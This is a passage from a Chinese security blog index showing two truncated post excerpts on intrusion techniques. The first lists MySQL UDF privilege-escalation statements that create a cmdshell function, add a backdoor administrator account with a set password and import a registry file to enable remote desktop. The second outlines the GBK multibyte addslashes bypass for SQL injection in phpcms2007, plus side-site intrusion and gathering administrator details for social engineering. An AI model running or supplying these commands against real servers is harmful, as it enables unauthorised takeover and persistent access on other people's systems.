Swane's blog

摘要： 一UDF提权 这类提权方法我想大家已经知道了，我大致写一下，具体语句如下： createfunctioncmdshellreturnsstringsoname’udf.dll’ selectcmdshell(’netuseriis_user123!@#abcABC/add’); selectcmdshell(’netlocalgroupadministratorsiis_user/add’); selectcmdshell(’regedit/sd:\web\3389.reg’); dropfunctioncmdshell; selectcmdshell(’netstat-an’); 二VBS启 阅读全文

摘要： 渗透测试，注入是很常见的手法了。记得有个很经典的多字节编码漏洞。其漏洞引发的原理是：0xbf27不是有一个有效的GBK字符，但是经过addslashed()转换后就变成0xbf5c27,0xbf5c是个有效的GBK字符，所以0xbf5c27会当作一个字符0xbf5c和一个单绰号来处理，结果是跟在引号后查询语句得到了执行。在phpcms2007程序里由多字节编码漏洞引发的漏洞有多个，以area.php文件里的漏洞来作测试。渗透测试利用的方法主要是旁注，旁注的意义在于“曲径通幽”，进而获取系统权限。在此之前，收集数据库信息、系统信息、网站信息和系统管理员的信息进行综合分析利用，在社工是有意义的。在 阅读全文